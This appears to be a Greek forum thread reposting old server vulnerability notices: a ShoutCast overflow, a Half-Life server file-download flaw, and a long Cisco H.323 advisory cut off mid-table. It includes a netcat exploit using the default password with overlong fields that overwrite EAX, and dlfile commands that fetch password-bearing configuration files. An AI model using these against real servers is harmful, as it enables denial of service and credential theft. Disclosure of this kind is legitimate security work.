# Software > Ασφάλεια >  Επίπεδο Υπηρεσιών

## Mick Flemm

Εδώ θα postάρονται θέματα σχετικά με τους διαφόρους servers (daemons) που τρέχουμε ή ενδέχεται να τρέξουμε...

----------


## Mick Flemm

*Shoutcast...*

Informations :
°°°°°°°°°°°°
Language : Microsoft Visual C++ v5.0/v6.0 (MFC)
Bugged Version : ShoutCast server 1.9.2/win32 (and less ?)
Patched version : none
Website : http://www.shoutcast.com
Problems : DoS if we know the password from the server

Objects :
°°°°°°°
- sc_serv.exe
vulnerable variable: icy-name(Server Desc) and icy-url(Stream URL)

Exploits :
°°°°°°°°
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre :: oS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

...
stream audio data
...

P.S. Default password "changeme" !!!

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.shoutcast.com ...

----------


## Mick Flemm

*Haλflife / Counter Strike Server*

Vendor: Valve software 
Software: hlds, all versions (including steam). 
Problem: Information leak, DoS 
Author: SYZo[SND] 

Problem: 
in server configuration, if allowdownload = 1, it's possible to download 
any file from directory of the current game (cstrike was tested) or from 
'valve' directory from server. Allowdownload is required to allow 
clients to retrieve new maps from server. 

Impact: 
It's possible to download configuration files (like server.cfg, 
configuration files for different mods, etc) with sensitive information, 
including passwords. Additionally, downloading large file (for example 
map) causes server to crash. 

"Exploit": 


```
cmd dlfile server.cfg 
cmd dlfile addons/amx/users.ini 
cmd dlfile addons/amx/mysql.cfg 
cmd dlfile maps/de_torn.bsp
```

Workaround: 
*disable downloads.*

----------


## Mick Flemm

*Cisco ATA & Stuff*

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: Vulnerabilities in H.323 Message Processing

Document ID: 47843

Revision 1.0 - INTERIM

For Public Release 2004 January 13 UTC 1200

- --------------------------------------------------------------------------

Contents
========

Summary
Affected Products
Unaffected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice: INTERIM
Distribution
Revision History
Cisco Security Procedures

- --------------------------------------------------------------------------

Summary
=======

Multiple Cisco products contain vulnerabilities in the processing of H.323
messages, which are typically used in Voice over Internet Protocol (VoIP)
or multimedia applications. A test suite has been developed by the
University of Oulu to target this protocol and identify vulnerabilities.

Support for the H.323 protocol was introduced in Cisco IOS? Software
Release 11.3T. Release 11.3T, and all later Cisco IOS releases are
affected if configured for various types of voice/multimedia application
support. Vulnerable devices include those configured as an H.323 network
element as well as those configured for IOS Network Address Translation
(NAT) and those configured for IOS Firewall (also known as Context-Based
Access Control [CBAC]).

Other Cisco voice products that do not run Cisco IOS may also be affected.

These vulnerabilities can be exploited repeatedly to produce a denial of
service (DoS).

This advisory is available at 
http://www.cisco.com/warp/public/707/ci ... h323.shtml.

Affected Products
=================

All Cisco products that run Cisco IOS software and support H.323 packet
processing are affected. This may include devices configured for Session
Initiation Protocol (SIP) or Media Gateway Control Protocol (MGCP), since
support for these protocols can enable support for H.323. Cisco AS5xxx
series platforms are vulnerable regardless of their configuration because
of a bug that enables H.323 but does not allow the protocol to be turned
off.

Other affected products that do not run Cisco IOS software include:

* Cisco CallManager versions 3.0 through 3.3

* Cisco Conference Connection (CCC)

* Cisco Internet Service Node (ISN)

* Cisco BTS 10200 Softswitch

* Cisco 7905 IP Phone H.323 Software Version 1.00

* Cisco ATA 18x series products running H.323/SIP loads with versions
earlier than 2.16.1

Note: Cisco ATA 18x series products are only vulnerable when configured
for H.323. They are not vulnerable when configured for SIP.

To determine the software running on a Cisco product, log in to the device
and issue the show version command to display the system banner. Cisco IOS
Software will identify itself as "Internetwork Operating System Software"
or simply "IOS." On the next line of output, the image name will be
displayed between parentheses, followed by "Version" and the IOS release
name. Other Cisco devices will not have the show version command or will
give different output.

The following example identifies a Cisco product running Cisco IOS
Software Release 12.0(3) with an installed image name of C2500-IS-L. The
release train label is 12.0.

Cisco Internetwork Operating System Software IOS (TM)
2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE

The following example shows a product running Cisco IOS Software Release
12.0(2a)T1 with an image name of C2600-JS-MZ.

Cisco Internetwork Operating System Software IOS (tm)
C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)

Additional information about Cisco IOS version naming is available at 
http://www.cisco.com/warp/public/620/1.html.

If you are running Cisco IOS versions 10.x, 11.1, 11.2 or earlier, you are
not affected.


Cisco IOS Processing of H.323 Traffic

There are three areas where IOS can be vulnerable to malformed H.323
packets. Please read the following sections to determine if your router is
affected.

Note: If you choose to block H.323 traffic using an access list to prevent
H.323 traffic from entering the router, then you are protected and need
not bother with the details below. Please see the Workarounds section for
more details on how to do this. Cisco recommends that customers upgrade to
an appropriate IOS image at their earliest convenience.

To determine if your Cisco IOS device is processing H.323 traffic and is
possibly vulnerable, it is necessary to understand the three different
ways that Cisco IOS software processes H.323 traffic.

1. H.323 Endpoints

This includes H.323 Gateway, H.323 Gatekeeper, H.323 Gatekeeper with Proxy
and ALL of the AS5xxx platforms.

- From the enable prompt, run the show process cpu command and look for a
process called CCH323_CT. In later versions of Cisco IOS software, you can
execute the show process cpu | include CCH323_CT .

Router# show process cpu | include CCH323_CT
112 Mwe 60F3E5E0 295112 239401 123220072/24000 0 CCH323_CT

Note: Not all access server images support H.323. Only images with a
"PLUS" feature set (such as IP PLUS, ENTERPRISE PLUS) support voice and
will have the CCH323_CT process running.

* If you see the a process called CCH323_CT, your router is affected.
Please consult the IOS table to determine which version is appropriate
for your device. If you cannot immediately upgrade, the following
workarounds may work for you

+ If you are not using H.323 within your network, an inbound access
list to block TCP port 1720 will protect your router, but it is
recommended that you upgrade as soon as is feasible.

+ If you are using H.323, then you can configure an access list to
restrict TCP port 1720 traffic to known, trusted IP addresses.
Again, upgrading as soon as is feasible is recommended.

* If you do NOT see the CCH323_CT process, you may still be vulnerable.
Some configurations of H.323 Gatekeeper are vulnerable. Affected
configurations are those gatekeepers configured for H.323 Proxy. To
check to see if you are configured as a gatekeeper, check your
configuration for the line "proxy h323" in the global configuration.
If you have "proxy h323" configured, then you are vulnerable.

+ If you are not using GK proxy functionality, you can disable proxy
functionality by doing the following configuration.

Note: This will drop all calls being managed by the gatekeeper.
Perform this only when you can safely stop gatekeeper
functionality.

Router(config)#no proxy h323
Router(config)#gatekeeper
Router(config-gk)#shutdown
Router(config-gk)#no shutdown

+ If you are using H.323 proxy, your options are to either configure
an access list to restrict TCP port 1720 traffic to known, trusted
IP addresses, or to upgrade your IOS version.

2. IOS Firewall (Context-Based Access Control)

If your IOS device is configured to use IOS Firewall (IOS FW, or
Context-Based Access Control [CBAC]), check to see if IOS FW is running on
the device by issuing the show ip inspect all command. Look for the
following lines indicating that IOS FW is applied to an interface. In this
case, inspection rule "<NAME>" is applied inbound to interface
FastEthernet0/0.

Interface Configuration
Interface FastEthernet0/0
Inbound inspection rule is <NAME>
tcp alert is on audit-trail is off timeout 3600
h323 alert is on audit-trail is off timeout 3600
Outgoing inspection rule is not set

* To turn off inbound IOS FW (CBAC) on interface FastEthernet0/0, enter
the following commands in interface configuration mode.

Router#config t
Router(config)#Interface FastEthernet 0/0
Router(config-if)#no ip inspect <NAME> in

* If outbound IOS FW (CBAC) is configured on FastEthernet0/0, enter the
following commands in interface configuration mode.

Router#config t
Router(config)#Interface FastEthernet 0/0
Router(config-if)#no ip inspect <NAME> out

* To turn off the IOS FW (CBAC) processing of H.323 messages only while
leaving other IOS FW behavior unaffected, enter the following command
in global configuration mode.

Router(config)#no ip inspect name <NAME> h323

Cisco recommends that you upgrade your IOS as soon as possible.

3. IOS Network Address Translation (NAT)

If you have configured NAT rules and have NAT activated on any interface,
check to see if NAT is configured and activated on the device by issuing
the show ip nat statistics command.

Router#show ip nat statistics

Total active translations: 3 (3 static, 0 dynamic; 0 extended
Outside interfaces
Inside interfaces
Hits: 0 Misses: 0
Expired translations: 0
Dynamic mappings:

* If there is no output or the output doesn't list any inside or outside
interfaces (as in the example above), then the IOS device is not doing
NAT and you are not vulnerable because of NAT.

* If the output does list any inside or outside interfaces, then you may
be vulnerable because of NAT. An example is shown below.

Total active translations: 3 (3 static, 0 dynamic; 0 extended
Outside interfaces:
Serial3/0
Inside interfaces:
Serial1/0
Hits: 0 Misses: 0
Expired translations: 0
Dynamic mappings:

* You are not vulnerable because of NAT if your configuration only
contains Port Address Translation (PAT) statements and your PAT
statements do not explicitly specify TCP port 1720 in your PAT
translations.

+ To see if you are doing only PAT, check to see if your IOS NAT
configuration contains any of the following NAT rules without the 
overload, route-map, or extendable keywords.

ip nat outside source ...
ip nat inside destination ...
ip nat inside source ...

If you see any of the above lines without the overload, route-map,
or extendable keywords, then you are vulnerable.

+ To see if you are doing a static PAT for H.323 (TCP port 1720),
look for any lines with the following pattern.

ip nat (inside|outside) source static tcp
ip-addr (port|1720) ip-addr (1720|port)

The following examples would be vulnerable.

ip nat inside source static tcp 10.1.0.1 1720 10.2.0.1 5834
ip nat outside source static tcp 10.15.12.1 6884 10.6.7.1 1720
ip nat inside source static tcp 10.1.0.17 1720 10.33.14.1 1720

The following examples would not be vulnerable.

ip nat inside source static tcp 10.1.0.17 53 10.33.14.1 53
ip nat outside source static udp 10.1.14.75 1720 10.131.1.1 6888

If any of your configuration lines are vulnerable, please consult
the Workarounds section.

To determine if a particular Cisco IOS release is vulnerable, consult the
list below in the Software Versions and Fixes section to determine if the
product is running an affected version of software.

Unaffected Products
===================

The following list of Cisco products is provided specifically to list
those products that customers may also be concerned about in regards to
these vulnerabilities. The products below are not affected either because
they are not vulnerable or because they do not support H.323 processing.
Any other Cisco products that have not been identified as vulnerable or
have been omitted from the list below should be considered as not
vulnerable, as no other Cisco products are known to be affected by these
vulnerabilities.

* Cisco IP Phone models 7960, 7940, 7912, 7910, 7902, 30VIP, and 12SP+

* Cisco uOne (All Versions)

* VG248 Analog Phone Gateway

* Cisco Unity Server

* Catalyst 6000 WS-X6608 Voice Services Module and WS-X6624 FXS Analog
Station Interface Module

* PGW2200, SC2200, VSC3000 and H.323 Signalling Interface (HSI)

* Cisco IP/VC 3500 Series

* IP/TV series

* Catalyst 19xx, 28xx, 290x, 292x, 2948g, 3000, 3200, 3900, 4000, 4912g,
and 5000 series switches

* Catalyst 2900XL, 2900XL-LRE, 2940, 2950, 2950-LRE, 2955, 2970, 3500XL,
3550, and 3750 series switches

* Cache Engine series

* Content Engine series

* SN5400 series storage routers

* VPN 3000 and VPN 5000 series VPN concentrators

* Voice Interworking Service Module (VISM)

* VCO/4K

* Cisco Secure Intrusion Detection System (NetRanger) appliance and IDS
Module

* BR340, WGB340, AP340, AP350, and BR350 Cisco/Aironet wireless products

* Cisco Aironet 1100 series, 1200 series, and 1400 series wireless
products

* Cisco PIX Firewall

* Cisco Catalyst 6500 Series Firewall Services Module

* Cisco 6xx series DSL modems running CBOS

* Cisco 7xx series routers

* Cisco 12000 series routers

* Cisco 10000 series routers

* 61xx and 62xx series DSLAMs

* Cisco CSS11xxx series (including SSL Accelerator)

* LocalDirector

* BPX, IGX, MGX WAN switches, and the Service Expansion Shelf

* Cisco Intelligent Contact Management (ICM)

* Cisco ONS 15xxx platforms

Details
=======

H.323 is the International Telecommunications Union (ITU) standard for
real-time multimedia communications and conferencing over packet-based
(IP) networks. A subset of the H.323 standard is H.225.0, a standard used
for call signalling protocols and media stream packetization over IP
networks.

The H.225.0 standard defines message formats for call setup, call control,
and communications using Abstract Syntax Notation One (ASN.1). ITU
Standard Q.931, which was developed for call signalling purposes in ISDN
networks, is also used as the standard for the call setup messages within
H.225.0.

The University of Oulu Secure Programming Group (OUSPG) has created a test
suite for H.323, more specifically the H.225.0 and Q.931 messages, to help
support proactive discovery and resolution of vulnerabilities in the
processing of H.323 messages. The test suite is generally used to analyze
a protocol and produce messages that probe various design limits within an
implementation of a protocol. Test packets containing overly long or
exceptional elements in various fields of the H.323 Protocol Data Units
(PDUs) can be programmatically generated and then transmitted to a network
device under test. The PROTOS test suite for H.323, as distributed,
contains approximately 4500 individual test cases.

The vulnerabilities discovered in the affected products can be easily and
repeatedly demonstrated with the use of the OUSPG PROTOS Test Suite for
H.323. The largest group of vulnerabilities described in this advisory
result from insufficient checking of H.225.0 messages as they are received
and processed by an affected system. Malformed H.225.0 messages received
by affected systems can cause various parsing and processing functions to
fail, which may result in a system crash and reload (or reboot) in most
circumstances.

Typically, H.323 network elements implement call signalling over both UDP
and TCP transports on port 1720. The H.323 test suite from OUSPG only
tests the TCP implementation on port 1720 by default.


Cisco IOS

+------------------------------------------+
| Cisco IOS | Description of |
| Software | Vulnerability |
| Release | |
|--------------+---------------------------|
| 11.1, 11.2, | Not vulnerable |
| 11.3, 12.3 | |
|--------------+---------------------------|
| | Vulnerabilities exist in |
| 11.3T, 12.0, | the processing of H.323 |
| 12.0S,12.0T, | Network Element traffic. |
| 12.1, 12.1T, | This includes H.323 |
| 12.1E, 12.2, | Gateway, H323 Gatekeeper, |
| 12.2S, 12.2T | and H.323 Gatekeeper with |
| | Proxy. |
|--------------+---------------------------|
| 12.1, 12.1E, | Vulnerabilities exist in |
| 12.2, 12.2T, | the processing of H.323 |
| 12.2S, 12.3T | IOS NAT traffic. |
|--------------+---------------------------|
| 12.0, 12.1, | Vulnerabilities exist in |
| 12.1E, 12.2, | the processing of H.323 |
| 12..2T, | IOS Firewall (CBAC) |
| 12.2S | traffic. |
+------------------------------------------+

The vulnerabilities in Cisco IOS for devices acting as H.323 dial-peer
endpoints are documented in the following Bug IDs: CSCdt09262 ( registered
customers only) , CSCdt54401 ( registered customers only) , CSCdw14262 ( 
registered customers only) , CSCdx76632 ( registered customers only) , 
CSCdx77253 ( registered customers only) , CSCea19885 ( registered
customers only) , CSCea32240 ( registered customers only) , CSCea36231 ( 
registered customers only) , CSCea33065 ( registered customers only) , 
CSCea42826 ( registered customers only) , CSCea42527 ( registered
customers only) , CSCea44227 ( registered customers only) , CSCea44309 ( 
registered customers only) , CSCea46342 ( registered customers only) , and
CSCec79541 ( registered customers only) .

For those Cisco IOS devices acting as a H.323 gatekeeper with proxy
configured, the vulnerabilities are documented in the following Bug IDs: 
CSCea51076 ( registered customers only) , CSCea51030 ( registered
customers only) , and CSCea54851 ( registered customers only) .

Cisco IOS devices performing NAT translations on H.323 v3/4 traffic may be
vulnerable. Releases based off 12.2T must be running a version of IOS that
is based off 12.2(11)T or later and must have the hidden command ip nat
service h323all enabled. The default condition for this command is
disabled. In releases based off 12.1 and 12.1E, the device is only
vulnerable to packets sent from the outside interface to the inside
interface. This means that networks are only vulnerable if they have
static translations configured and accept connections to port 1720. A
dynamic translation can occur on port 1720, but the attack traffic would
then have to return from the destination address of the original flow and
must traverse the router while the translation is still active. Methods to
reduce exposure for dynamic translations are listed in the Workarounds
section.

The vulnerabilities in Cisco IOS for devices doing NAT on H.323 packets
starting in IOS 12.1 are documented in the following Bug IDs: CSCdr48143 (
registered customers only) , CSCdx40184 ( registered customers only) , 
CSCea27536 ( registered customers only) , CSCec76694 ( registered
customers only) , and CSCed28873 ( registered customers only) .

The vulnerabilities in Cisco IOS for devices running IOS Firewall Feature
Set doing deep packet inspection of H.323 packets in IOS starting in 12.1
are documented in the following Bug IDs: CSCec76776 ( registered customers
only) and CSCec87533 ( registered customers only) .


Cisco CallManager

The vulnerabilities in Cisco CallManager are documented in Bug IDs 
CSCdx82831 ( registered customers only) , CSCea46545 ( registered
customers only) , and CSCea55518 ( registered customers only) .

In order for a Cisco CallManager running 3.1 or 3.2 to be vulnerable, the
IP address of the originating device must be configured as a H.323
gateway, H.323 client, or intercluster trunk on the CallManager, or "Allow
Anonymous Calls" must be enabled in the gatekeeper section of the
CallManager configuration. If a CallManager receives H.323 messages from a
device that is not configured as an H.225.0 device, the TCP session will
be closed before the H.225.0 message is processed. If "Allow Anonymous
Calls" is enabled in the gatekeeper configuration, the CallManager server
is vulnerable since it will try to parse the H.225.0 message from any
originating source.

In CallManager 3.3, the server is vulnerable and will try to parse H.225.0
messages received from any originating source, but the CallManager may be
listening on a port other than TCP 1720. Since the port number for
anonymous calls is something other than TCP 1720, a potential attacker
would need to determine which random port the CallManager H.323 gateway is
listening on in order to carry out a successful attack.


Cisco Conference Connection

All versions of Cisco Conference Connection (CCC) are affected. There are
currently no software fixes planned for Cisco Conference Connection (CCC).
Customers running CCC should implement a workaround to limit H.323 traffic
from trusted hosts only. A workaround for this may be found in the 
Workarounds section.


Cisco Internet Service Node

All versions of Internet Service Node (ISN) are affected. There are
currently no software fixes planned for Cisco Internet Service Node (ISN).
Customers running ISN should implement a workaround to limit H.323 traffic
from trusted hosts only. A workaround for this may be found in the 
Workarounds section.


Cisco 7905 Series IP Phone

The vulnerabilities in the Cisco 7905 IP Phone are documented in Bug ID 
CSCec77152 ( registered customers only) .


Cisco ATA18x Series Analog Telephony Devices

The vulnerabilities in the Cisco ATA18x devices are documented in Bug IDs 
CSCea46231 ( registered customers only) and CSCea48726 ( registered
customers only) .


Cisco BTS 10200 Softswitch

The vulnerabilities in the Cisco BTS 10200 Softswitch are documented in
BugID CSCea48755 ( registered customers only) .

Impact
======

The vulnerabilities may be exploited to produce a denial of service (DoS)
attack. When the vulnerabilities are exploited, they may cause an affected
product to crash and reload. In the case of the Cisco CallManager, ISN,
and CCC, exploitation will result in a crash or a hang indicated by
processor utilization of 100%. When the CPU utilization is at 100% on
server-based platforms, call processing services degrade severely, calls
may drop, and no new calls can be established. A reboot of the device is
required to return it to normal service.

Software Versions and Fixes
===========================

Cisco IOS Software

Each row of the table describes a release train and the platforms or
products for which it is intended. If a given release train is vulnerable,
then the earliest possible releases that contain the fix and the
anticipated date of availability for each are listed in the Rebuild,
Interim, and Maintenance columns. In some cases, no rebuild of a
particular release is planned; this is marked with the label "Not
scheduled." A device running any release in the given train that is
earlier than the release in a specific column (less than the earliest
fixed release) is known to be vulnerable, and it should be upgraded at
least to the indicated release or a later version (greater than the
earliest fixed release label).

When selecting a release, keep in mind the following definitions.

* Maintenance

Most heavily tested and highly recommended release of any label in a
given row of the table.

* Rebuild

Constructed from the previous maintenance or major release in the same
train, it contains the fix for a specific vulnerability. Although it
receives less testing, it contains only the minimal changes necessary
to effect the repair. Cisco has made available several rebuilds of
mainline trains to address this vulnerability, but strongly recommends
running only the latest maintenance release on mainline trains.

* Interim

Built at regular intervals between maintenance releases and receives
less testing. Interims should be selected only if there is no other
suitable release that addresses the vulnerability, and interim images
should be upgraded to the next available maintenance release as soon
as possible. Interim releases are not available through manufacturing,
and usually they are not available for customer download from CCO
without prior arrangement with the Cisco Technical Assistance Center
(TAC).

In all cases, customers should exercise caution to be certain the devices
to be upgraded contain sufficient memory and that current hardware and
software configurations will continue to be supported properly by the new
release. If the information is not clear, contact the Cisco TAC for
assistance, as shown in the section following this table.

Note: For the purposes of the table below, the identifier "Element"
covers the fixes for IOS devices running as H.323 endpoints and as
gatekeepers with proxy configured.

+-----------------------------------------------------------------+
| Train | Vulnerable | Availability of Fixed Releases |
| | Configuration | |
|------------------------+----------------------------------------|
| 10.x-based Releases | Not Vulnerable |
|------------------------+----------------------------------------|
| 11.x-based Releases | Rebuild | Interim | Maintenance |
|------------------------+----------------------------------------|
| 11.0 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1AA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1CA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1CC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2P | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2SA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.3 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Introduced H.323 feature in 11.3(3)T |
| | | |
| | | Vulnerable |
| 11.3T | | |
| | | No Software Fixes Scheduled |
| | | |
| | | Migrate to 12.0 |
|------------------------+----------------------------------------|
| 12.0-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | | | | 12.0(2 ::  |
| | Element | | | |
| | | | | available |
| | | | | 15-Jan-2004 |
| |---------------+-------------+-----------+--------------|
| 12.0 | | | | 12.0(2 ::  |
| | NAT | | | |
| | | | | available |
| | | | | 15-Jan-2004 |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0D | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0DC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | 2600/3600 | | |
| | | Platforms | | |
| | | ONLY | | 2600/3600 |
| | | | | Platforms |
| | Element | 12.0(25)S1, | | ONLY |
| | | | | |
| 12.0S | | 12.0(24)S2, | | 12.0(26)S |
| | | | | |
| | | 12.0(23)S3 | | |
| |---------------+----------------------------------------|
| | NAT | Not Vulnerable |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SL | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SP | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0ST | | No fixes planned, only 2600/3600 |
| | | platforms vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0T | | Vulnerable. No fixes planned. |
|--------+---------------+----------------------------------------|
| 12.0W5 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0WC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0WT | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0XC | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XD | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XG | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XH | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XI | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XJ | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XK | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.0XL | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XN | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XQ | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XR | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| | | Vulnerable. |
| 12.0XT | | |
| | | No migration path |
|------------------------+----------------------------------------|
| 12.1-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | Element | 12.1(21a) | | 12.1(22) |
| |---------------+-------------+-----------+--------------|
| 12.1 | NAT | 12.1(21a) | | 12.1(22) |
| |---------------+-------------+-----------+--------------|
| | IPFW | 12.1(21a) | | 12.1(22) |
|--------+---------------+----------------------------------------|
| 12.1AA | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1AX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1AY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.1(20)E1 | | |
| |---------------+-------------+-----------+--------------|
| | | 12.1(8b) | | |
| | | E18, | | |
| | | | | |
| | | 12.1(11b) | | |
| | | E14, | | |
| | | | | |
| | | 12.1(13) | 12.1 | |
| | NAT | E13, | (21.3)E | |
| | | | | |
| | | 12.1(14) | | |
| | | E10, | | |
| | | | | |
| | | 12.1(19)E6, | | |
| 12.1E | | | | |
| | | 12.1(20)E2 | | |
| |---------------+-------------+-----------+--------------|
| | | 12.1(8b) | | |
| | | E16, | | |
| | | | | |
| | | 12.1(11b) | | |
| | | E14, | | |
| | | | | |
| | IPFW | 12.1(13) | 12.1 | |
| | | E12, | (21.3)E | |
| | | | | |
| | | 12.1(14)E4, | | |
| | | | | |
| | | 12.1(19)E6, | | |
| | | | | |
| | | 12.1(20)E1 | | |
|--------+---------------+----------------------------------------|
| 12.1EA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | |  |
| 12.1EC | | No migration path |
| | | |
| | | No fixed release |
|--------+---------------+----------------------------------------|
| 12.1EV | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EW | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1EY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| | | |
| 12.1EZ | | Not yet migrated |
| | | |
| | | No rebuild planned |
|--------+---------------+----------------------------------------|
| | Element | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
| |---------------+-------------+-----------+--------------|
| 12.1T | NAT | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
| |---------------+-------------+-----------+--------------|
| | IPFW | 12.1(5)T17 | | Migrate to |
| | | | | 12.2(19) |
|--------+--------------------------------------------------------|
| 12.1X | 12.1X releases generally migrate to 12.1T, 12.2 or |
| (l) | 12.2T as specified below. Please refer to specific |
| | train technical notes for documented migration path. |
|--------+--------------------------------------------------------|
| 12.1XA | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XC | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XD | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XF | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1XG | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XH | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XI | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1XJ | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XL | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XM | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XP | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XQ | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XR | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XT | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1XU | | Vulnerable. Migrate to 12.2(4)T6 |
|--------+---------------+----------------------------------------|
| 12.1XV | | Vulnerable. Migrate to 12.2(2)XB14 |
|--------+---------------+----------------------------------------|
| 12.1XW | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YB | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YC | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YD | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YE | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YF | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YH | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YI | | Vulnerable. Migrate to 12.2(15)T5 |
|--------+---------------+----------------------------------------|
| 12.1YJ | | Not Vulnerable |
|------------------------+----------------------------------------|
| 12.2-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | | 12.2(10g), | | |
| | | | | |
| | Element | 12.2(13c), | | 12.2(17) |
| | | | | |
| | | 12.2(16a) | | |
| |---------------+-------------+-----------+--------------|
| | | 12.2(10g), | | |
| | | | | |
| | | 12.2(13c), | | |
| 12.2 | | | | |
| | | 12.2(16f) | | |
| | NAT | | | 12.2(19) |
| | | 12.2(17d) | | |
| | | | | |
| | | 12.2(19b) | | |
| | | | | |
| | | 12.2(21a) | | |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2B | | Migrate to 12.3(1a) |
|--------+---------------+----------------------------------------|
| 12.2BC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.2BW | | Migrate to | | Migrate to |
| | | 12.2(15)T5 | | 12.3(1a) |
|--------+---------------+----------------------------------------|
| | | Vulnerable |
| 12.2BX | | |
| | | No migration path |
|--------+---------------+----------------------------------------|
| 12.2BZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
